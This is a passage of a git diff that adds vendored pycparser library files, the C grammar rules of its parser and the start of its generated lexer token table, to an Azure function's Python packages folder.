TYPEID brace_open brace_close + """ + klass = self._select_struct_union_class(p[1]) + if len(p) == 5: + # Empty sequence means an empty list of members + p[0] = klass( + name=p[2], + decls=[], + coord=self._token_coord(p, 2)) + else: + p[0] = klass( + name=p[2], + decls=p[4], + coord=self._token_coord(p, 2)) + + def p_struct_or_union(self, p): + """ struct_or_union : STRUCT + | UNION + """ + p[0] = p[1] + + # Combine all declarations into a single list + # + def p_struct_declaration_list(self, p): + """ struct_declaration_list : struct_declaration + | struct_declaration_list struct_declaration + """ + if len(p) == 2: + p[0] = p[1] or [] + else: + p[0] = p[1] + (p[2] or []) + + def p_struct_declaration_1(self, p): + """ struct_declaration : specifier_qualifier_list struct_declarator_list_opt SEMI + """ + spec = p[1] + assert 'typedef' not in spec['storage'] + + if p[2] is not None: + decls = self._build_declarations( + spec=spec, + decls=p[2]) + + elif len(spec['type']) == 1: + # Anonymous struct/union, gcc extension, C1x feature. + # Although the standard only allows structs/unions here, I see no + # reason to disallow other types since some compilers have typedefs + # here, and pycparser isn't about rejecting all invalid code. + # + node = spec['type'][0] + if isinstance(node, c_ast.Node): + decl_type = node + else: + decl_type = c_ast.IdentifierType(node) + + decls = self._build_declarations( + spec=spec, + decls=[dict(decl=decl_type)]) + + else: + # Structure/union members can have the same names as typedefs. + # The trouble is that the member's name gets grouped into + # specifier_qualifier_list; _build_declarations compensates. + # + decls = self._build_declarations( + spec=spec, + decls=[dict(decl=None, init=None)]) + + p[0] = decls + + def p_struct_declaration_2(self, p): + """ struct_declaration : SEMI + """ + p[0] = None + + def p_struct_declaration_3(self, p): + """ struct_declaration : pppragma_directive + """ + p[0] = [p[1]] + + def p_struct_declarator_list(self, p): + """ struct_declarator_list : struct_declarator + | struct_declarator_list COMMA struct_declarator + """ + p[0] = p[1] + [p[3]] if len(p) == 4 else [p[1]] + + # struct_declarator passes up a dict with the keys: decl (for + # the underlying declarator) and bitsize (for the bitsize) + # + def p_struct_declarator_1(self, p): + """ struct_declarator : declarator + """ + p[0] = {'decl': p[1], 'bitsize': None} + + def p_struct_declarator_2(self, p): + """ struct_declarator : declarator COLON constant_expression + | COLON constant_expression + """ + if len(p) > 3: + p[0] = {'decl': p[1], 'bitsize': p[3]} + else: + p[0] = {'decl': c_ast.TypeDecl(None, None, None, None), 'bitsize': p[2]} + + def p_enum_specifier_1(self, p): + """ enum_specifier : ENUM ID + | ENUM TYPEID + """ + p[0] = c_ast.Enum(p[2], None, self._token_coord(p, 1)) + + def p_enum_specifier_2(self, p): + """ enum_specifier : ENUM brace_open enumerator_list brace_close + """ + p[0] = c_ast.Enum(None, p[3], self._token_coord(p, 1)) + + def p_enum_specifier_3(self, p): + """ enum_specifier : ENUM ID brace_open enumerator_list brace_close + | ENUM TYPEID brace_open enumerator_list brace_close + """ + p[0] = c_ast.Enum(p[2], p[4], self._token_coord(p, 1)) + + def p_enumerator_list(self, p): + """ enumerator_list : enumerator + | enumerator_list COMMA + | enumerator_list COMMA enumerator + """ + if len(p) == 2: + p[0] = c_ast.EnumeratorList([p[1]], p[1].coord) + elif len(p) == 3: + p[0] = p[1] + else: + p[1].enumerators.append(p[3]) + p[0] = p[1] + + def 
p_alignment_specifier(self, p): + """ alignment_specifier : _ALIGNAS LPAREN type_name RPAREN + | _ALIGNAS LPAREN constant_expression RPAREN + """ + p[0] = c_ast.Alignas(p[3], self._token_coord(p, 1)) + + def p_enumerator(self, p): + """ enumerator : ID + | ID EQUALS constant_expression + """ + if len(p) == 2: + enumerator = c_ast.Enumerator( + p[1], None, + self._token_coord(p, 1)) + else: + enumerator = c_ast.Enumerator( + p[1], p[3], + self._token_coord(p, 1)) + self._add_identifier(enumerator.name, enumerator.coord) + + p[0] = enumerator + + def p_declarator(self, p): + """ declarator : id_declarator + | typeid_declarator + """ + p[0] = p[1] + + @parameterized(('id', 'ID'), ('typeid', 'TYPEID'), ('typeid_noparen', 'TYPEID')) + def p_xxx_declarator_1(self, p): + """ xxx_declarator : direct_xxx_declarator + """ + p[0] = p[1] + + @parameterized(('id', 'ID'), ('typeid', 'TYPEID'), ('typeid_noparen', 'TYPEID')) + def p_xxx_declarator_2(self, p): + """ xxx_declarator : pointer direct_xxx_declarator + """ + p[0] = self._type_modify_decl(p[2], p[1]) + + @parameterized(('id', 'ID'), ('typeid', 'TYPEID'), ('typeid_noparen', 'TYPEID')) + def p_direct_xxx_declarator_1(self, p): + """ direct_xxx_declarator : yyy + """ + p[0] = c_ast.TypeDecl( + declname=p[1], + type=None, + quals=None, + align=None, + coord=self._token_coord(p, 1)) + + @parameterized(('id', 'ID'), ('typeid', 'TYPEID')) + def p_direct_xxx_declarator_2(self, p): + """ direct_xxx_declarator : LPAREN xxx_declarator RPAREN + """ + p[0] = p[2] + + @parameterized(('id', 'ID'), ('typeid', 'TYPEID'), ('typeid_noparen', 'TYPEID')) + def p_direct_xxx_declarator_3(self, p): + """ direct_xxx_declarator : direct_xxx_declarator LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET + """ + quals = (p[3] if len(p) > 5 else []) or [] + # Accept dimension qualifiers + # Per C99 6.7.5.3 p7 + arr = c_ast.ArrayDecl( + type=None, + dim=p[4] if len(p) > 5 else p[3], + dim_quals=quals, + coord=p[1].coord) + + p[0] = self._type_modify_decl(decl=p[1], modifier=arr) + + @parameterized(('id', 'ID'), ('typeid', 'TYPEID'), ('typeid_noparen', 'TYPEID')) + def p_direct_xxx_declarator_4(self, p): + """ direct_xxx_declarator : direct_xxx_declarator LBRACKET STATIC type_qualifier_list_opt assignment_expression RBRACKET + | direct_xxx_declarator LBRACKET type_qualifier_list STATIC assignment_expression RBRACKET + """ + # Using slice notation for PLY objects doesn't work in Python 3 for the + # version of PLY embedded with pycparser; see PLY Google Code issue 30. + # Work around that here by listing the two elements separately. 
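+        #
+        # Illustrative values (editorial sketch, not from upstream): for
+        #
+        #     void f(int a[static const 10]);
+        #
+        # the first alternative gives p[3] == 'static' and p[4] == ['const'],
+        # so dim_quals below becomes ['static', 'const'].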
+ listed_quals = [item if isinstance(item, list) else [item] + for item in [p[3],p[4]]] + dim_quals = [qual for sublist in listed_quals for qual in sublist + if qual is not None] + arr = c_ast.ArrayDecl( + type=None, + dim=p[5], + dim_quals=dim_quals, + coord=p[1].coord) + + p[0] = self._type_modify_decl(decl=p[1], modifier=arr) + + # Special for VLAs + # + @parameterized(('id', 'ID'), ('typeid', 'TYPEID'), ('typeid_noparen', 'TYPEID')) + def p_direct_xxx_declarator_5(self, p): + """ direct_xxx_declarator : direct_xxx_declarator LBRACKET type_qualifier_list_opt TIMES RBRACKET + """ + arr = c_ast.ArrayDecl( + type=None, + dim=c_ast.ID(p[4], self._token_coord(p, 4)), + dim_quals=p[3] if p[3] is not None else [], + coord=p[1].coord) + + p[0] = self._type_modify_decl(decl=p[1], modifier=arr) + + @parameterized(('id', 'ID'), ('typeid', 'TYPEID'), ('typeid_noparen', 'TYPEID')) + def p_direct_xxx_declarator_6(self, p): + """ direct_xxx_declarator : direct_xxx_declarator LPAREN parameter_type_list RPAREN + | direct_xxx_declarator LPAREN identifier_list_opt RPAREN + """ + func = c_ast.FuncDecl( + args=p[3], + type=None, + coord=p[1].coord) + + # To see why _get_yacc_lookahead_token is needed, consider: + # typedef char TT; + # void foo(int TT) { TT = 10; } + # Outside the function, TT is a typedef, but inside (starting and + # ending with the braces) it's a parameter. The trouble begins with + # yacc's lookahead token. We don't know if we're declaring or + # defining a function until we see LBRACE, but if we wait for yacc to + # trigger a rule on that token, then TT will have already been read + # and incorrectly interpreted as TYPEID. We need to add the + # parameters to the scope the moment the lexer sees LBRACE. + # + if self._get_yacc_lookahead_token().type == "LBRACE": + if func.args is not None: + for param in func.args.params: + if isinstance(param, c_ast.EllipsisParam): break + self._add_identifier(param.name, param.coord) + + p[0] = self._type_modify_decl(decl=p[1], modifier=func) + + def p_pointer(self, p): + """ pointer : TIMES type_qualifier_list_opt + | TIMES type_qualifier_list_opt pointer + """ + coord = self._token_coord(p, 1) + # Pointer decls nest from inside out. This is important when different + # levels have different qualifiers. For example: + # + # char * const * p; + # + # Means "pointer to const pointer to char" + # + # While: + # + # char ** const p; + # + # Means "const pointer to pointer to char" + # + # So when we construct PtrDecl nestings, the leftmost pointer goes in + # as the most nested type. 
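+        #
+        # Illustrative nestings (editorial sketch, not from upstream) for the
+        # two examples above, listed from the Decl downward:
+        #
+        #     char * const * p;  ->  PtrDecl([]) -> PtrDecl(['const']) -> TypeDecl('p')
+        #     char ** const p;   ->  PtrDecl(['const']) -> PtrDecl([]) -> TypeDecl('p')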
+ nested_type = c_ast.PtrDecl(quals=p[2] or [], type=None, coord=coord) + if len(p) > 3: + tail_type = p[3] + while tail_type.type is not None: + tail_type = tail_type.type + tail_type.type = nested_type + p[0] = p[3] + else: + p[0] = nested_type + + def p_type_qualifier_list(self, p): + """ type_qualifier_list : type_qualifier + | type_qualifier_list type_qualifier + """ + p[0] = [p[1]] if len(p) == 2 else p[1] + [p[2]] + + def p_parameter_type_list(self, p): + """ parameter_type_list : parameter_list + | parameter_list COMMA ELLIPSIS + """ + if len(p) > 2: + p[1].params.append(c_ast.EllipsisParam(self._token_coord(p, 3))) + + p[0] = p[1] + + def p_parameter_list(self, p): + """ parameter_list : parameter_declaration + | parameter_list COMMA parameter_declaration + """ + if len(p) == 2: # single parameter + p[0] = c_ast.ParamList([p[1]], p[1].coord) + else: + p[1].params.append(p[3]) + p[0] = p[1] + + # From ISO/IEC 9899:TC2, 6.7.5.3.11: + # "If, in a parameter declaration, an identifier can be treated either + # as a typedef name or as a parameter name, it shall be taken as a + # typedef name." + # + # Inside a parameter declaration, once we've reduced declaration specifiers, + # if we shift in an LPAREN and see a TYPEID, it could be either an abstract + # declarator or a declarator nested inside parens. This rule tells us to + # always treat it as an abstract declarator. Therefore, we only accept + # `id_declarator`s and `typeid_noparen_declarator`s. + def p_parameter_declaration_1(self, p): + """ parameter_declaration : declaration_specifiers id_declarator + | declaration_specifiers typeid_noparen_declarator + """ + spec = p[1] + if not spec['type']: + spec['type'] = [c_ast.IdentifierType(['int'], + coord=self._token_coord(p, 1))] + p[0] = self._build_declarations( + spec=spec, + decls=[dict(decl=p[2])])[0] + + def p_parameter_declaration_2(self, p): + """ parameter_declaration : declaration_specifiers abstract_declarator_opt + """ + spec = p[1] + if not spec['type']: + spec['type'] = [c_ast.IdentifierType(['int'], + coord=self._token_coord(p, 1))] + + # Parameters can have the same names as typedefs. The trouble is that + # the parameter's name gets grouped into declaration_specifiers, making + # it look like an old-style declaration; compensate. 
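+        #
+        # Illustrative case (editorial sketch, not from upstream): given
+        # `typedef char TT;`, the TT in `int foo(TT);` is taken as a type
+        # (an unnamed parameter of type TT), while in `int foo(int TT);`
+        # it is a parameter named TT.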
+ # + if len(spec['type']) > 1 and len(spec['type'][-1].names) == 1 and \ + self._is_type_in_scope(spec['type'][-1].names[0]): + decl = self._build_declarations( + spec=spec, + decls=[dict(decl=p[2], init=None)])[0] + + # This truly is an old-style parameter declaration + # + else: + decl = c_ast.Typename( + name='', + quals=spec['qual'], + align=None, + type=p[2] or c_ast.TypeDecl(None, None, None, None), + coord=self._token_coord(p, 2)) + typename = spec['type'] + decl = self._fix_decl_name_type(decl, typename) + + p[0] = decl + + def p_identifier_list(self, p): + """ identifier_list : identifier + | identifier_list COMMA identifier + """ + if len(p) == 2: # single parameter + p[0] = c_ast.ParamList([p[1]], p[1].coord) + else: + p[1].params.append(p[3]) + p[0] = p[1] + + def p_initializer_1(self, p): + """ initializer : assignment_expression + """ + p[0] = p[1] + + def p_initializer_2(self, p): + """ initializer : brace_open initializer_list_opt brace_close + | brace_open initializer_list COMMA brace_close + """ + if p[2] is None: + p[0] = c_ast.InitList([], self._token_coord(p, 1)) + else: + p[0] = p[2] + + def p_initializer_list(self, p): + """ initializer_list : designation_opt initializer + | initializer_list COMMA designation_opt initializer + """ + if len(p) == 3: # single initializer + init = p[2] if p[1] is None else c_ast.NamedInitializer(p[1], p[2]) + p[0] = c_ast.InitList([init], p[2].coord) + else: + init = p[4] if p[3] is None else c_ast.NamedInitializer(p[3], p[4]) + p[1].exprs.append(init) + p[0] = p[1] + + def p_designation(self, p): + """ designation : designator_list EQUALS + """ + p[0] = p[1] + + # Designators are represented as a list of nodes, in the order in which + # they're written in the code. + # + def p_designator_list(self, p): + """ designator_list : designator + | designator_list designator + """ + p[0] = [p[1]] if len(p) == 2 else p[1] + [p[2]] + + def p_designator(self, p): + """ designator : LBRACKET constant_expression RBRACKET + | PERIOD identifier + """ + p[0] = p[2] + + def p_type_name(self, p): + """ type_name : specifier_qualifier_list abstract_declarator_opt + """ + typename = c_ast.Typename( + name='', + quals=p[1]['qual'][:], + align=None, + type=p[2] or c_ast.TypeDecl(None, None, None, None), + coord=self._token_coord(p, 2)) + + p[0] = self._fix_decl_name_type(typename, p[1]['type']) + + def p_abstract_declarator_1(self, p): + """ abstract_declarator : pointer + """ + dummytype = c_ast.TypeDecl(None, None, None, None) + p[0] = self._type_modify_decl( + decl=dummytype, + modifier=p[1]) + + def p_abstract_declarator_2(self, p): + """ abstract_declarator : pointer direct_abstract_declarator + """ + p[0] = self._type_modify_decl(p[2], p[1]) + + def p_abstract_declarator_3(self, p): + """ abstract_declarator : direct_abstract_declarator + """ + p[0] = p[1] + + # Creating and using direct_abstract_declarator_opt here + # instead of listing both direct_abstract_declarator and the + # lack of it in the beginning of _1 and _2 caused two + # shift/reduce errors. 
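
A small, hedged demonstration (assumes `pycparser` is importable) of where
these abstract declarators appear; `int (*)[4]` below is a pointer to an array
of four ints with no declared name:

    from pycparser import c_parser

    ast = c_parser.CParser().parse("int n = sizeof(int (*)[4]);")
    ast.show()
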
+ # + def p_direct_abstract_declarator_1(self, p): + """ direct_abstract_declarator : LPAREN abstract_declarator RPAREN """ + p[0] = p[2] + + def p_direct_abstract_declarator_2(self, p): + """ direct_abstract_declarator : direct_abstract_declarator LBRACKET assignment_expression_opt RBRACKET + """ + arr = c_ast.ArrayDecl( + type=None, + dim=p[3], + dim_quals=[], + coord=p[1].coord) + + p[0] = self._type_modify_decl(decl=p[1], modifier=arr) + + def p_direct_abstract_declarator_3(self, p): + """ direct_abstract_declarator : LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET + """ + quals = (p[2] if len(p) > 4 else []) or [] + p[0] = c_ast.ArrayDecl( + type=c_ast.TypeDecl(None, None, None, None), + dim=p[3] if len(p) > 4 else p[2], + dim_quals=quals, + coord=self._token_coord(p, 1)) + + def p_direct_abstract_declarator_4(self, p): + """ direct_abstract_declarator : direct_abstract_declarator LBRACKET TIMES RBRACKET + """ + arr = c_ast.ArrayDecl( + type=None, + dim=c_ast.ID(p[3], self._token_coord(p, 3)), + dim_quals=[], + coord=p[1].coord) + + p[0] = self._type_modify_decl(decl=p[1], modifier=arr) + + def p_direct_abstract_declarator_5(self, p): + """ direct_abstract_declarator : LBRACKET TIMES RBRACKET + """ + p[0] = c_ast.ArrayDecl( + type=c_ast.TypeDecl(None, None, None, None), + dim=c_ast.ID(p[3], self._token_coord(p, 3)), + dim_quals=[], + coord=self._token_coord(p, 1)) + + def p_direct_abstract_declarator_6(self, p): + """ direct_abstract_declarator : direct_abstract_declarator LPAREN parameter_type_list_opt RPAREN + """ + func = c_ast.FuncDecl( + args=p[3], + type=None, + coord=p[1].coord) + + p[0] = self._type_modify_decl(decl=p[1], modifier=func) + + def p_direct_abstract_declarator_7(self, p): + """ direct_abstract_declarator : LPAREN parameter_type_list_opt RPAREN + """ + p[0] = c_ast.FuncDecl( + args=p[2], + type=c_ast.TypeDecl(None, None, None, None), + coord=self._token_coord(p, 1)) + + # declaration is a list, statement isn't. 
To make it consistent, block_item + # will always be a list + # + def p_block_item(self, p): + """ block_item : declaration + | statement + """ + p[0] = p[1] if isinstance(p[1], list) else [p[1]] + + # Since we made block_item a list, this just combines lists + # + def p_block_item_list(self, p): + """ block_item_list : block_item + | block_item_list block_item + """ + # Empty block items (plain ';') produce [None], so ignore them + p[0] = p[1] if (len(p) == 2 or p[2] == [None]) else p[1] + p[2] + + def p_compound_statement_1(self, p): + """ compound_statement : brace_open block_item_list_opt brace_close """ + p[0] = c_ast.Compound( + block_items=p[2], + coord=self._token_coord(p, 1)) + + def p_labeled_statement_1(self, p): + """ labeled_statement : ID COLON pragmacomp_or_statement """ + p[0] = c_ast.Label(p[1], p[3], self._token_coord(p, 1)) + + def p_labeled_statement_2(self, p): + """ labeled_statement : CASE constant_expression COLON pragmacomp_or_statement """ + p[0] = c_ast.Case(p[2], [p[4]], self._token_coord(p, 1)) + + def p_labeled_statement_3(self, p): + """ labeled_statement : DEFAULT COLON pragmacomp_or_statement """ + p[0] = c_ast.Default([p[3]], self._token_coord(p, 1)) + + def p_selection_statement_1(self, p): + """ selection_statement : IF LPAREN expression RPAREN pragmacomp_or_statement """ + p[0] = c_ast.If(p[3], p[5], None, self._token_coord(p, 1)) + + def p_selection_statement_2(self, p): + """ selection_statement : IF LPAREN expression RPAREN statement ELSE pragmacomp_or_statement """ + p[0] = c_ast.If(p[3], p[5], p[7], self._token_coord(p, 1)) + + def p_selection_statement_3(self, p): + """ selection_statement : SWITCH LPAREN expression RPAREN pragmacomp_or_statement """ + p[0] = fix_switch_cases( + c_ast.Switch(p[3], p[5], self._token_coord(p, 1))) + + def p_iteration_statement_1(self, p): + """ iteration_statement : WHILE LPAREN expression RPAREN pragmacomp_or_statement """ + p[0] = c_ast.While(p[3], p[5], self._token_coord(p, 1)) + + def p_iteration_statement_2(self, p): + """ iteration_statement : DO pragmacomp_or_statement WHILE LPAREN expression RPAREN SEMI """ + p[0] = c_ast.DoWhile(p[5], p[2], self._token_coord(p, 1)) + + def p_iteration_statement_3(self, p): + """ iteration_statement : FOR LPAREN expression_opt SEMI expression_opt SEMI expression_opt RPAREN pragmacomp_or_statement """ + p[0] = c_ast.For(p[3], p[5], p[7], p[9], self._token_coord(p, 1)) + + def p_iteration_statement_4(self, p): + """ iteration_statement : FOR LPAREN declaration expression_opt SEMI expression_opt RPAREN pragmacomp_or_statement """ + p[0] = c_ast.For(c_ast.DeclList(p[3], self._token_coord(p, 1)), + p[4], p[6], p[8], self._token_coord(p, 1)) + + def p_jump_statement_1(self, p): + """ jump_statement : GOTO ID SEMI """ + p[0] = c_ast.Goto(p[2], self._token_coord(p, 1)) + + def p_jump_statement_2(self, p): + """ jump_statement : BREAK SEMI """ + p[0] = c_ast.Break(self._token_coord(p, 1)) + + def p_jump_statement_3(self, p): + """ jump_statement : CONTINUE SEMI """ + p[0] = c_ast.Continue(self._token_coord(p, 1)) + + def p_jump_statement_4(self, p): + """ jump_statement : RETURN expression SEMI + | RETURN SEMI + """ + p[0] = c_ast.Return(p[2] if len(p) == 4 else None, self._token_coord(p, 1)) + + def p_expression_statement(self, p): + """ expression_statement : expression_opt SEMI """ + if p[1] is None: + p[0] = c_ast.EmptyStatement(self._token_coord(p, 2)) + else: + p[0] = p[1] + + def p_expression(self, p): + """ expression : assignment_expression + | expression COMMA 
assignment_expression + """ + if len(p) == 2: + p[0] = p[1] + else: + if not isinstance(p[1], c_ast.ExprList): + p[1] = c_ast.ExprList([p[1]], p[1].coord) + + p[1].exprs.append(p[3]) + p[0] = p[1] + + def p_parenthesized_compound_expression(self, p): + """ assignment_expression : LPAREN compound_statement RPAREN """ + p[0] = p[2] + + def p_typedef_name(self, p): + """ typedef_name : TYPEID """ + p[0] = c_ast.IdentifierType([p[1]], coord=self._token_coord(p, 1)) + + def p_assignment_expression(self, p): + """ assignment_expression : conditional_expression + | unary_expression assignment_operator assignment_expression + """ + if len(p) == 2: + p[0] = p[1] + else: + p[0] = c_ast.Assignment(p[2], p[1], p[3], p[1].coord) + + # K&R2 defines these as many separate rules, to encode + # precedence and associativity. Why work hard ? I'll just use + # the built in precedence/associativity specification feature + # of PLY. (see precedence declaration above) + # + def p_assignment_operator(self, p): + """ assignment_operator : EQUALS + | XOREQUAL + | TIMESEQUAL + | DIVEQUAL + | MODEQUAL + | PLUSEQUAL + | MINUSEQUAL + | LSHIFTEQUAL + | RSHIFTEQUAL + | ANDEQUAL + | OREQUAL + """ + p[0] = p[1] + + def p_constant_expression(self, p): + """ constant_expression : conditional_expression """ + p[0] = p[1] + + def p_conditional_expression(self, p): + """ conditional_expression : binary_expression + | binary_expression CONDOP expression COLON conditional_expression + """ + if len(p) == 2: + p[0] = p[1] + else: + p[0] = c_ast.TernaryOp(p[1], p[3], p[5], p[1].coord) + + def p_binary_expression(self, p): + """ binary_expression : cast_expression + | binary_expression TIMES binary_expression + | binary_expression DIVIDE binary_expression + | binary_expression MOD binary_expression + | binary_expression PLUS binary_expression + | binary_expression MINUS binary_expression + | binary_expression RSHIFT binary_expression + | binary_expression LSHIFT binary_expression + | binary_expression LT binary_expression + | binary_expression LE binary_expression + | binary_expression GE binary_expression + | binary_expression GT binary_expression + | binary_expression EQ binary_expression + | binary_expression NE binary_expression + | binary_expression AND binary_expression + | binary_expression OR binary_expression + | binary_expression XOR binary_expression + | binary_expression LAND binary_expression + | binary_expression LOR binary_expression + """ + if len(p) == 2: + p[0] = p[1] + else: + p[0] = c_ast.BinaryOp(p[2], p[1], p[3], p[1].coord) + + def p_cast_expression_1(self, p): + """ cast_expression : unary_expression """ + p[0] = p[1] + + def p_cast_expression_2(self, p): + """ cast_expression : LPAREN type_name RPAREN cast_expression """ + p[0] = c_ast.Cast(p[2], p[4], self._token_coord(p, 1)) + + def p_unary_expression_1(self, p): + """ unary_expression : postfix_expression """ + p[0] = p[1] + + def p_unary_expression_2(self, p): + """ unary_expression : PLUSPLUS unary_expression + | MINUSMINUS unary_expression + | unary_operator cast_expression + """ + p[0] = c_ast.UnaryOp(p[1], p[2], p[2].coord) + + def p_unary_expression_3(self, p): + """ unary_expression : SIZEOF unary_expression + | SIZEOF LPAREN type_name RPAREN + | _ALIGNOF LPAREN type_name RPAREN + """ + p[0] = c_ast.UnaryOp( + p[1], + p[2] if len(p) == 3 else p[3], + self._token_coord(p, 1)) + + def p_unary_operator(self, p): + """ unary_operator : AND + | TIMES + | PLUS + | MINUS + | NOT + | LNOT + """ + p[0] = p[1] + + def p_postfix_expression_1(self, p): + """ 
postfix_expression : primary_expression """ + p[0] = p[1] + + def p_postfix_expression_2(self, p): + """ postfix_expression : postfix_expression LBRACKET expression RBRACKET """ + p[0] = c_ast.ArrayRef(p[1], p[3], p[1].coord) + + def p_postfix_expression_3(self, p): + """ postfix_expression : postfix_expression LPAREN argument_expression_list RPAREN + | postfix_expression LPAREN RPAREN + """ + p[0] = c_ast.FuncCall(p[1], p[3] if len(p) == 5 else None, p[1].coord) + + def p_postfix_expression_4(self, p): + """ postfix_expression : postfix_expression PERIOD ID + | postfix_expression PERIOD TYPEID + | postfix_expression ARROW ID + | postfix_expression ARROW TYPEID + """ + field = c_ast.ID(p[3], self._token_coord(p, 3)) + p[0] = c_ast.StructRef(p[1], p[2], field, p[1].coord) + + def p_postfix_expression_5(self, p): + """ postfix_expression : postfix_expression PLUSPLUS + | postfix_expression MINUSMINUS + """ + p[0] = c_ast.UnaryOp('p' + p[2], p[1], p[1].coord) + + def p_postfix_expression_6(self, p): + """ postfix_expression : LPAREN type_name RPAREN brace_open initializer_list brace_close + | LPAREN type_name RPAREN brace_open initializer_list COMMA brace_close + """ + p[0] = c_ast.CompoundLiteral(p[2], p[5]) + + def p_primary_expression_1(self, p): + """ primary_expression : identifier """ + p[0] = p[1] + + def p_primary_expression_2(self, p): + """ primary_expression : constant """ + p[0] = p[1] + + def p_primary_expression_3(self, p): + """ primary_expression : unified_string_literal + | unified_wstring_literal + """ + p[0] = p[1] + + def p_primary_expression_4(self, p): + """ primary_expression : LPAREN expression RPAREN """ + p[0] = p[2] + + def p_primary_expression_5(self, p): + """ primary_expression : OFFSETOF LPAREN type_name COMMA offsetof_member_designator RPAREN + """ + coord = self._token_coord(p, 1) + p[0] = c_ast.FuncCall(c_ast.ID(p[1], coord), + c_ast.ExprList([p[3], p[5]], coord), + coord) + + def p_offsetof_member_designator(self, p): + """ offsetof_member_designator : identifier + | offsetof_member_designator PERIOD identifier + | offsetof_member_designator LBRACKET expression RBRACKET + """ + if len(p) == 2: + p[0] = p[1] + elif len(p) == 4: + p[0] = c_ast.StructRef(p[1], p[2], p[3], p[1].coord) + elif len(p) == 5: + p[0] = c_ast.ArrayRef(p[1], p[3], p[1].coord) + else: + raise NotImplementedError("Unexpected parsing state. 
len(p): %u" % len(p)) + + def p_argument_expression_list(self, p): + """ argument_expression_list : assignment_expression + | argument_expression_list COMMA assignment_expression + """ + if len(p) == 2: # single expr + p[0] = c_ast.ExprList([p[1]], p[1].coord) + else: + p[1].exprs.append(p[3]) + p[0] = p[1] + + def p_identifier(self, p): + """ identifier : ID """ + p[0] = c_ast.ID(p[1], self._token_coord(p, 1)) + + def p_constant_1(self, p): + """ constant : INT_CONST_DEC + | INT_CONST_OCT + | INT_CONST_HEX + | INT_CONST_BIN + | INT_CONST_CHAR + """ + uCount = 0 + lCount = 0 + for x in p[1][-3:]: + if x in ('l', 'L'): + lCount += 1 + elif x in ('u', 'U'): + uCount += 1 + t = '' + if uCount > 1: + raise ValueError('Constant cannot have more than one u/U suffix.') + elif lCount > 2: + raise ValueError('Constant cannot have more than two l/L suffix.') + prefix = 'unsigned ' * uCount + 'long ' * lCount + p[0] = c_ast.Constant( + prefix + 'int', p[1], self._token_coord(p, 1)) + + def p_constant_2(self, p): + """ constant : FLOAT_CONST + | HEX_FLOAT_CONST + """ + if 'x' in p[1].lower(): + t = 'float' + else: + if p[1][-1] in ('f', 'F'): + t = 'float' + elif p[1][-1] in ('l', 'L'): + t = 'long double' + else: + t = 'double' + + p[0] = c_ast.Constant( + t, p[1], self._token_coord(p, 1)) + + def p_constant_3(self, p): + """ constant : CHAR_CONST + | WCHAR_CONST + | U8CHAR_CONST + | U16CHAR_CONST + | U32CHAR_CONST + """ + p[0] = c_ast.Constant( + 'char', p[1], self._token_coord(p, 1)) + + # The "unified" string and wstring literal rules are for supporting + # concatenation of adjacent string literals. + # I.e. "hello " "world" is seen by the C compiler as a single string literal + # with the value "hello world" + # + def p_unified_string_literal(self, p): + """ unified_string_literal : STRING_LITERAL + | unified_string_literal STRING_LITERAL + """ + if len(p) == 2: # single literal + p[0] = c_ast.Constant( + 'string', p[1], self._token_coord(p, 1)) + else: + p[1].value = p[1].value[:-1] + p[2][1:] + p[0] = p[1] + + def p_unified_wstring_literal(self, p): + """ unified_wstring_literal : WSTRING_LITERAL + | U8STRING_LITERAL + | U16STRING_LITERAL + | U32STRING_LITERAL + | unified_wstring_literal WSTRING_LITERAL + | unified_wstring_literal U8STRING_LITERAL + | unified_wstring_literal U16STRING_LITERAL + | unified_wstring_literal U32STRING_LITERAL + """ + if len(p) == 2: # single literal + p[0] = c_ast.Constant( + 'string', p[1], self._token_coord(p, 1)) + else: + p[1].value = p[1].value.rstrip()[:-1] + p[2][2:] + p[0] = p[1] + + def p_brace_open(self, p): + """ brace_open : LBRACE + """ + p[0] = p[1] + p.set_lineno(0, p.lineno(1)) + + def p_brace_close(self, p): + """ brace_close : RBRACE + """ + p[0] = p[1] + p.set_lineno(0, p.lineno(1)) + + def p_empty(self, p): + 'empty : ' + p[0] = None + + def p_error(self, p): + # If error recovery is added here in the future, make sure + # _get_yacc_lookahead_token still works! 
+ # + if p: + self._parse_error( + 'before: %s' % p.value, + self._coord(lineno=p.lineno, + column=self.clex.find_tok_column(p))) + else: + self._parse_error('At end of input', self.clex.filename) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/lextab.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/lextab.py new file mode 100644 index 0000000..7858983 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/lextab.py @@ -0,0 +1,10 @@ +# lextab.py. This file automatically created by PLY (version 3.10). Don't edit! +_tabversion = '3.10' +_lextokens = set(('INT_CONST_CHAR', 'VOID', 'LBRACKET', 'WCHAR_CONST', 'FLOAT_CONST', 'MINUS', 'RPAREN', 'STRUCT', 'LONG', 'PLUS', 'ELLIPSIS', 'U32STRING_LITERAL', 'GT', 'GOTO', 'ENUM', 'PERIOD', 'GE', 'INT_CONST_DEC', 'ARROW', '_STATIC_ASSERT', '__INT128', 'HEX_FLOAT_CONST', 'DOUBLE', 'MINUSEQUAL', 'INT_CONST_OCT', 'TIMESEQUAL', 'OR', 'SHORT', 'RETURN', 'RSHIFTEQUAL', '_ALIGNAS', 'RESTRICT', 'STATIC', 'SIZEOF', 'UNSIGNED', 'PLUSPLUS', 'COLON', 'WSTRING_LITERAL', 'DIVIDE', 'FOR', 'UNION', 'EQUALS', 'ELSE', 'ANDEQUAL', 'EQ', 'AND', 'TYPEID', 'LBRACE', 'PPHASH', 'INT', 'SIGNED', 'CONTINUE', 'NOT', 'OREQUAL', 'MOD', 'RSHIFT', 'DEFAULT', '_NORETURN', 'CHAR', 'WHILE', 'DIVEQUAL', '_ALIGNOF', 'EXTERN', 'LNOT', 'CASE', 'LAND', 'REGISTER', 'MODEQUAL', 'NE', 'SWITCH', 'INT_CONST_HEX', '_COMPLEX', 'PPPRAGMASTR', 'PLUSEQUAL', 'U32CHAR_CONST', 'CONDOP', 'U8STRING_LITERAL', 'BREAK', 'VOLATILE', 'PPPRAGMA', 'INLINE', 'INT_CONST_BIN', 'DO', 'U8CHAR_CONST', 'CONST', 'U16STRING_LITERAL', 'LOR', 'CHAR_CONST', 'LSHIFT', 'RBRACE', '_BOOL', 'LE', 'SEMI', '_THREAD_LOCAL', 'LT', 'COMMA', 'U16CHAR_CONST', 'OFFSETOF', '_ATOMIC', 